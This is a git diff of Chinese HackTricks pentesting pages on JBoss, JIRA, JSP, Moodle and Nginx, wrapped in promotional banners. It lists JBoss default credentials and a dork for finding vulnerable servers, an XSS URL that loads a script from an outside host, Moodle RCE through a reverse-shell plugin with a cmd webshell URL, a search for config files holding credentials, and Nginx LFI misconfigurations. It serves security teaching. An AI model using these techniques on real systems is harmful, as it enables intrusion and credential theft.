在评估 web 应用程序的安全性时,某些路径如 _/web-console/ServerInfo.jsp__/status?full=true_ 对于揭示 **服务器详细信息** 至关重要。对于 JBoss 服务器,路径如 _/admin-console_、_/jmx-console_、_/management_ 和 _/web-console_ 可能是关键。这些路径可能允许访问 **管理 servlet**,默认凭据通常设置为 **admin/admin**。此访问权限便于通过特定 servlet 与 MBeans 进行交互:
* 对于JBoss版本6和7使用**/web-console/Invoker**。
* 在JBoss 5及更早版本中可用**/invoker/JMXInvokerServlet**和**/invoker/EJBInvokerServlet**。
* 对于 JBoss 版本 6 7使用 **/web-console/Invoker**。
* 在 JBoss 5 及更早版本中,提供 **/invoker/JMXInvokerServlet** 和 **/invoker/EJBInvokerServlet**。
**clusterd**这样的工具,可在[https://github.com/hatRiot/clusterd](https://github.com/hatRiot/clusterd)获取以及Metasploit模块`auxiliary/scanner/http/jboss_vulnscan`可用于枚举和潜在利用JBOSS服务中的漏洞
**clusterd** 这样的工具可用于枚举和潜在利用 JBoss 服务中的漏洞,地址为 [https://github.com/hatRiot/clusterd](https://github.com/hatRiot/clusterd),以及 Metasploit 模块 `auxiliary/scanner/http/jboss_vulnscan`
### 利用资源
要利用漏洞,诸如[JexBoss](https://github.com/joaomatosf/jexboss)之类的资源提供了有价值的工具。
要利用漏洞,资源如 [JexBoss](https://github.com/joaomatosf/jexboss) 提供了有价值的工具。
### 查找易受攻击目标
### 寻找易受攻击的目标
Google Dorking可以帮助识别具有查询条件如:`inurl:status EJInvokerServlet`的易受攻击服务器。
Google Dorking 可以通过查询如:`inurl:status EJInvokerServlet` 来帮助识别易受攻击的服务器。
<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**漏洞赏金提示****注册**Intigriti这是一家由黑客创建的高级**漏洞赏金平台**!立即加入我们,访问[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
**漏洞赏金提示****注册** **Intigriti**,一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

50
network-services-pentesting/pentesting-web/jira.md
View file

@ -1,30 +1,32 @@
# JIRA
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
{% endhint %}
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
如果您对**黑客职业**感兴趣并想要黑掉不可能黑掉的东西 - **我们正在招聘!**(需要流利的波兰语书面和口语表达能力)。
如果你对 **黑客职业** 感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_需要流利的波兰语书写和口语能力_).
{% embed url="https://www.stmcyber.com/careers" %}
### 检查权限
Jira中**权限可以通过任何用户(已认证或未认证)**通过端点`/rest/api/2/mypermissions`或`/rest/api/3/mypermissions`来检查。这些端点会显示用户当前的权限。当**未经身份验证的用户拥有权限**时,可能会出现**安全漏洞**,这可能有资格获得**赏金**。同样,对于已认证用户的**意外权限**也突显了一个**漏洞**
Jira 中,**任何用户**(无论是否经过身份验证)都可以通过 `/rest/api/2/mypermissions``/rest/api/3/mypermissions` 端点 **检查权限**。这些端点揭示了用户当前的权限。当 **未认证用户拥有权限** 时,出现了一个显著的担忧,这表明存在 **安全漏洞**,可能有资格获得 **赏金**。同样,**认证用户的意外权限** 也突显了一个 **漏洞**
一个重要的**更新**是在**2019年2月1日**进行的,要求'mypermissions'端点包括一个**'permission'参数**。此要求旨在通过指定正在查询的权限来**增强安全性**[在此处查看](https://developer.atlassian.com/cloud/jira/platform/change-notice-get-my-permissions-requires-permissions-query-parameter/#change-notice---get-my-permissions-resource-will-require-a-permissions-query-parameter)
**2019年2月1日** 进行了重要的 **更新**,要求 'mypermissions' 端点包含 **'permission' 参数**。此要求旨在通过指定查询的权限来 **增强安全性** [在这里查看](https://developer.atlassian.com/cloud/jira/platform/change-notice-get-my-permissions-requires-permissions-query-parameter/#change-notice---get-my-permissions-resource-will-require-a-permissions-query-parameter)
* ADD\_COMMENTS
* ADMINISTER
@ -68,7 +70,7 @@
* VIEW\_VOTERS\_AND\_WATCHERS
* WORK\_ON\_ISSUES
示例:`https://your-domain.atlassian.net/rest/api/2/mypermissions?permissions=BROWSE_PROJECTS,CREATE_ISSUES,ADMINISTER_PROJECTS`
示例: `https://your-domain.atlassian.net/rest/api/2/mypermissions?permissions=BROWSE_PROJECTS,CREATE_ISSUES,ADMINISTER_PROJECTS`
```bash
#Check non-authenticated privileges
curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"havePermission": true'
@ -78,22 +80,24 @@ curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"h
* [https://github.com/0x48piraj/Jiraffe](https://github.com/0x48piraj/Jiraffe)
* [https://github.com/bcoles/jira\_scan](https://github.com/bcoles/jira\_scan)
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
如果您对**黑客职业**感兴趣并想要攻破不可攻破的 - **我们正在招聘!**(需要流利的波兰语书面和口语表达能力)。
如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!**_需要流利的波兰语书写和口语能力_)。
{% embed url="https://www.stmcyber.com/careers" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
</details>
{% endhint %}

38
network-services-pentesting/pentesting-web/jsp.md
View file

@ -1,39 +1,41 @@
# JSP
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## **getContextPath** 滥用
来自[这里](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html)。
信息来自 [这里](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html).
```
http://127.0.0.1:8080/&sol;rakeshmane.com/xss.js&num;/..;/..;/contextPathExample/test.jsp
```
访问该网站,您可以将所有链接更改为请求信息到 _**rakeshmane.com**_
访问该网站时,您可以更改所有链接以请求信息到 _**rakeshmane.com**_
![](<../../.gitbook/assets/image (326).png>)
{% hint style="success" %}
学习和实践 AWS Hacking<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP Hacking <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

56
network-services-pentesting/pentesting-web/moodle.md
View file

@ -1,22 +1,24 @@
# Moodle
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
{% endhint %}
<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**漏洞赏金提示****注册**Intigriti这是一家由黑客创建的高级**漏洞赏金平台**!立即加入我们,访问[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
**漏洞赏金提示****注册** **Intigriti**,一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -43,8 +45,6 @@ Admin panel - http://moodle.schooled.htb/moodle/login/
[+] Scan finished (0:00:05.643539 elapsed)
```
### moodlescan
### moodlescan
```bash
#Install from https://github.com/inc0d3/moodlescan
@ -75,8 +75,6 @@ Vulnerabilities found: 0
Scan completed.
```
### CMSMap
### CMSMap
```bash
pip3 install git+https://github.com/dionach/CMSmap.git
@ -84,23 +82,23 @@ cmsmap http://moodle.example.com/<moodle_path>
```
### CVEs
我发现自动工具在发现影响 Moodle 版本的漏洞方面相当**无用**。您可以在 [**https://snyk.io/vuln/composer:moodle%2Fmoodle**](https://snyk.io/vuln/composer:moodle%2Fmoodle) 进行**检查**
我发现自动工具在查找影响moodle版本的漏洞方面非常**无用**。你可以在[**https://snyk.io/vuln/composer:moodle%2Fmoodle**](https://snyk.io/vuln/composer:moodle%2Fmoodle)中**检查**它们
## **RCE**
您需要具有**管理员**角色,可以在**"站点管理"**选项卡内**安装插件**
你需要拥有**管理员**角色,并且你**可以在**“网站管理”**选项卡中安装插件**\*\*:\*\*
![](<../../.gitbook/assets/image (630).png>)
即使您是管理员,您可能仍然需要**激活此选项**。您可以查看 Moodle 特权升级 PoC 中的操作:[https://github.com/HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321)。
如果你是管理员,你可能仍然需要**激活此选项**。你可以在moodle特权升级PoC中查看如何操作:[https://github.com/HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321)。
然后,您可以**安装以下插件**,其中包含经典的 pentest-monkey php r**ev shell**(在上传之前,您需要解压缩它,更改 revshell 的 IP 和端口,然后再次压缩):
然后,你可以**安装以下插件**该插件包含经典的pentest-monkey php r**ev shell**_在上传之前你需要解压缩它修改revshell的IP和端口然后再压缩它_
{% file src="../../.gitbook/assets/moodle-rce-plugin.zip" %}
或者您可以使用来自 [https://github.com/HoangKien1020/Moodle\_RCE](https://github.com/HoangKien1020/Moodle\_RCE) 的插件,以使用带有 "cmd" 参数的常规 PHP shell。
或者你可以使用来自[https://github.com/HoangKien1020/Moodle\_RCE](https://github.com/HoangKien1020/Moodle\_RCE)的插件以获取带有“cmd”参数的常规PHP shell。
要访问启动恶意插件,需要访问:
要访问启动恶意插件,需要访问:
```bash
http://domain.com/<moodle_path>/blocks/rce/lang/en/block_rce.php?cmd=id
```
@ -116,20 +114,22 @@ find / -name "config.php" 2>/dev/null | grep "moodle/config.php"
```
<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**漏洞赏提示**: **注册** Intigriti一个由黑客创建的高级**漏洞赏平台,为黑客而生**!今天加入我们,开始赚取高达**$100,000**的赏!
**漏洞赏提示**: **注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏平台**!今天加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)开始赚取高达 **$100,000** 的赏
{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
</details>
{% endhint %}

162
network-services-pentesting/pentesting-web/nginx.md
View file

@ -1,28 +1,29 @@
# Nginx
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**即时提供的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试具有从侦察到报告的20多种工具和功能。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块为他们节省一些时间深入挖掘弹出shell并享受乐趣。
**即时可用的漏洞评估与渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取 shell 并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
## 缺少根位置 <a href="#missing-root-location" id="missing-root-location"></a>
## 缺失的根目录 <a href="#missing-root-location" id="missing-root-location"></a>
在配置Nginx服务器时**root指令**通过定义文件提供服务的基本目录起着关键作用。请考虑下面的示例:
在配置 Nginx 服务器时,**root 指令**通过定义文件提供的基础目录发挥着关键作用。考虑下面的示例:
```bash
server {
root /etc/nginx;
@ -33,21 +34,21 @@ proxy_pass http://127.0.0.1:8080/;
}
}
```
这个配置中,`/etc/nginx` 被指定为根目录。这种设置允许访问指定根目录内的文件,比如 `/hello.txt`。然而,需要注意的是只定义了一个特定位置 (`/hello.txt`),并没有配置根位置 (`location / {...}`)。这个遗漏意味着根指令适用于全局,使得对根路径 `/` 的请求可以访问 `/etc/nginx` 下的文件。
此配置中,`/etc/nginx` 被指定为根目录。此设置允许访问指定根目录中的文件,例如 `/hello.txt`。然而,重要的是要注意,仅定义了一个特定位置(`/hello.txt`)。根位置(`location / {...}`)没有配置。这一遗漏意味着根指令适用于全局,使得对根路径 `/` 的请求能够访问 `/etc/nginx` 下的文件。
这个配置带来了一个关键的安全考虑。一个简单的 `GET` 请求,比如 `GET /nginx.conf`,可能通过提供位于 `/etc/nginx/nginx.conf` 的 Nginx 配置文件来暴露敏感信息。将根目录设置为一个不太敏感的目录,比如 `/etc`,可以减轻这个风险,但仍可能允许意外访问其他关键文件,包括其他配置文件、访问日志,甚至用于 HTTP 基本身份验证的加密凭据。
此配置引发了一个关键的安全考虑。一个简单的 `GET` 请求,例如 `GET /nginx.conf`,可能会通过提供位于 `/etc/nginx/nginx.conf` 的 Nginx 配置文件来暴露敏感信息。将根目录设置为不那么敏感的目录,例如 `/etc`,可以减轻此风险,但仍可能允许意外访问其他关键文件,包括其他配置文件、访问日志,甚至用于 HTTP 基本身份验证的加密凭据。
## 别名 LFI 配置错误 <a href="#alias-lfi-misconfiguration" id="alias-lfi-misconfiguration"></a>
## Alias LFI Misconfiguration <a href="#alias-lfi-misconfiguration" id="alias-lfi-misconfiguration"></a>
在 Nginx 的配置文件中,需要仔细检查 "location" 指令。一个称为本地文件包含 (LFI) 的漏洞可能会通过类似以下配置而被无意中引入
在 Nginx 的配置文件中,"location" 指令需要仔细检查。通过类似以下的配置可能会无意中引入一种称为本地文件包含LFI的漏洞
```
location /imgs {
alias /path/images/;
}
```
这种配置容易受到LFI攻击的影响因为服务器会将诸如`/imgs../flag.txt`这样的请求解释为试图访问目标目录之外的文件,最终解析为`/path/images/../flag.txt`。这个漏洞允许攻击者从服务器的文件系统中检索文件,这些文件本不应通过网络访问。
此配置容易受到LFI攻击因为服务器将请求如`/imgs../flag.txt`解释为尝试访问意图之外的文件,有效地解析为`/path/images/../flag.txt`。此缺陷允许攻击者从服务器的文件系统中检索不应通过网络访问的文件
为了减轻这种漏洞,应调整配置为:
为了减轻漏洞,应调整配置为:
```
location /imgs/ {
alias /path/images/;
@ -65,7 +66,7 @@ alias../ => HTTP status code 403
```
## 不安全的路径限制 <a href="#unsafe-variable-use" id="unsafe-variable-use"></a>
查看以下页面以了解如何绕过以下指令:
查看以下页面以了解如何绕过指令,例如
```plaintext
location = /admin {
deny all;
@ -79,27 +80,27 @@ deny all;
